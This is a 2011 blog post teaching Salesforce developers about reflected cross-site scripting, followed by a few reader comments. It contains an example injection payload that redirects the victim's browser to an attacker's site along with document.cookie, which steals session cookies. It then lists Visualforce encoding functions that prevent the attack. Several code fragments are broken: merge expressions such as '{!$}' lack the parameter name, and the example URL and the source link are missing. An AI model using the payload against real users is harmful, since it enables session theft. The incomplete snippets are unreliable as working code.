Saturday, 19 February 2011

Salesforce applications with security: Reflected XSS

XSS stands for cross-site scripting. It is a web application vulnerability that lets an attacker inject his own code into the client-side script of a page, so that it runs in the victim's browser with the victim's privileges. In a Salesforce application this means the injected script acts as the logged-in user, and so it can bypass the sharing rules that would otherwise limit the attacker; by doing this he can expose sensitive data, session cookies and more.

Now coming back to reflected XSS: here the injected script arrives in the request itself (typically as a URL parameter), is echoed into the page by the server without encoding, and executes as soon as the page loads. Suppose my page has a script block that copies a request parameter into a JavaScript variable; anyone who can get a user to open a crafted URL can then run his own script on that page load. This is known as reflected XSS.

Let's have a close look:
Here is a page; in its script block we are fetching the id request parameter into a JavaScript variable:
var xssExample = '{!$}' ;

Now have a deeper look:
The page is called as:

So when the page is loaded, the expression is evaluated in the following manner:
 var xssExample = '{!$}' ;
substituting the id value taken from the request parameter:
var xssExample = 'idvalue';1';document.location=''%2Bdocument.cookie;var%20foo=';

So here you can see that the id value closes the string literal early, the attacker's statements run as part of the page's own script, and all the cookies are sent to the attacker's site.

To prevent this, Salesforce provides encoding functions that can be used in Visualforce page expressions; the ones that matter here are listed below.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE($})' ;

So the value fetched from the request parameter is now encoded before it lands in the JavaScript string literal, and a quote in the value can no longer close that literal. Which function to use depends on where on the page the value is placed:
JSENCODE: for a value placed inside JavaScript (escapes the apostrophe, quote, backslash and similar characters so the value stays one string literal).
HTMLENCODE: for a value placed in HTML markup (turns characters such as <, > and & into HTML entities).
JSINHTMLENCODE: when calling a JavaScript method from an HTML component, for example an onclick attribute, and passing the value as an argument, since the value is parsed as HTML first and then as JavaScript.
URLENCODE: when building a URL on the page from the value.

Please feel free to ask the questions/doubts. Suggestions are appreciated.


  1. Here is the source of information :

  2. Indeed a helpful post for those who publish their app on AppExchange.

  3. Hi Bhawani,
    If we do encoding in JavaScript, say ({!JSENCODE($})), and again we need to send it by URL parameter, in that case do we have to get it back by decoding it?